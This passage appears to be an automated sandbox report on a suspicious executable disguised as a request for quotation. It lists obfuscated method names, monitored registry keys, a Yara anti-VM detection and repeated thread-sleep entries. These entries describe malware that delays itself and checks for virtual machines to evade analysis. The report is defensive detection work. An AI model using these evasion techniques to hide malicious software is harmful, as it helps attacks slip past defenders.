Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, mX5lZQf14Y4vmHBl6g.cs	High entropy of concatenated method names: 'Xxu6MpDkb2', 'BKa6uWnccw', 'tsh6HkDxPa', 'bd06N1e7se', 'bYQ65dGVw0', 'C2y6nlOymW', 'uII6ykdFuk', 'TGW6JZRJJ2', 'oTN6BGbXah', 'Q7Z69mC8Oo'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, tubn9U6Xcr3rV2SkV9.cs	High entropy of concatenated method names: 'pOiCn930DUG3HcPSxhF', 'hZmgID3Ke4jVvYo1g4S', 'oiJFe73ypgg38y58F52', 'adcbJkq9lW', 'huMbBsivuq', 'uNnb95bhfA', 'XltUF43JeZKnVEcYQTE', 'ok2KX43VlcICqXVJdog'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, NsTPTGXblfc3bcgyRi.cs	High entropy of concatenated method names: 'JAKXq33Syo', 'FPXXwG3TqH', 'f46XiqUFUT', 'R8lX0LiQ1o', 'AoJXChijY7', 'f5lXYE2eAL', 'bKnX7dKB07', 'lLBXlj1YGX', 'tdrXFpZG7x', 'PIlXVikMST'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, WleXrMrsrxEvCFlsrq.cs	High entropy of concatenated method names: 'mgIJk5p6UK', 'jAqJSf7HjK', 'DUEJDtD2v3', 'xIIJG1jJm0', 'hj1JqSgi5j', 'gCxJQFRavc', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, pq44S94bFJCMmq3UOsM.cs	High entropy of concatenated method names: 'WA6B1clu0v', 'BrUBrOeOmS', 'BdoBfktrsY', 'vgiBMM8Iug', 'O5FB3maIhW', 'LByBuyYeMQ', 'BRMB2FtklK', 'FuSBHmjKkO', 'oOdBNlB58t', 'gOyBoSC0j7'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, XNdSwjvdB2jmw6APpF.cs	High entropy of concatenated method names: 'RNcLH4elE2', 'InyLNvEquf', 'kq3LkQfkPt', 'EQJLSUdo3u', 'QZtLGjf6FT', 'PiLLQuIHwk', 'sCuL4bZaPY', 'BprLpc564O', 'yqPLdO5aKD', 'V6WLa5cpQ1'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, rL7WHPq1CmcimKVrpO.cs	High entropy of concatenated method names: 'X1L5dFQUcs', 'fOt5vw4ery', 'hsZ5qGKuUV', 'wdg5wZWLHN', 'YhS5SySmV4', 'HtQ5DkJHNk', 'cMa5GIEsMv', 'nt55Q9mO2N', 'YAj5tGDXOJ', 'HWU54ygL1a'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, OGWKdKhWOB85qEo1Jm.cs	High entropy of concatenated method names: 'wWDe1kq2FV', 'p40erWGmj9', 'yPvef1Jix7', 'EMpeMJ7Q67', 'sE2e3nq8S9', 'MD5euR2HFL', 'X0He2ftoOm', 'uOTeHoFlpQ', 'FZ1eNTGu39', 'imSeogfrlb'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, Wu07OfSGKg18tnUm6N.cs	High entropy of concatenated method names: 'Dqvg3TUNDO', 'W9Fg2dLaTt', 'HsJ6DZ910r', 'heY6GJy6ex', 'TfN6Qus0R6', 'ijc6tChNV3', 'bOa64OrgBy', 'wQZ6p7Z6ad', 'z0x6mau2fB', 'JMS6dsGHB4'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, WKSUxJdUAcFBg50a2b.cs	High entropy of concatenated method names: 'pHnbZ8OGDI', 'g2yb1BI8J3', 'FXabfxNW1Z', 'unKbMY3lBi', 'S4lbu6G7HI', 'VROb2h0Rl0', 's3abNAJjkO', 'TCGbo1tv25', 'BahfjH3UXWxS2SRTQ0n', 'sH9Q313wfuEpkwTjAdF'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, QBg919QotU4lls9Qe0.cs	High entropy of concatenated method names: 'RkMPenUGNg', 'ua1PsHTVW7', 'TU8PI3QQIU', 'iibPKhftJH', 'QNSP5GLTaL', 'MPPPn0eqAa', 'jQuZGLleUL45reLpk8', 's089j2AVlluIK6RV4s', 'X4QPPfJBqS', 'PEePc0P6Ra'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, cfuEKp9WUDtA9cTn3a.cs	High entropy of concatenated method names: 'M3qeh2jZ3M', 'CHme61xTEy', 'OyaebPAn8Q', 'kMMbVnO6lA', 'giXbzro6j3', 'qtGeW5oasu', 'PojePvBqG9', 'yO8eE87sGW', 'D3decX2g5s', 'A1MeOgfm2L'

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 2670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 7920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 8920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 8AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 9AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Memory allocated: 4BE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599543	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596043	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Window / User API: threadDelayed 7605			Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Window / User API: threadDelayed 2249			Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6972	Thread sleep count: 7605 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6972	Thread sleep count: 2249 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599543s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597795s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596484s >= -30000s	Jump to behavior
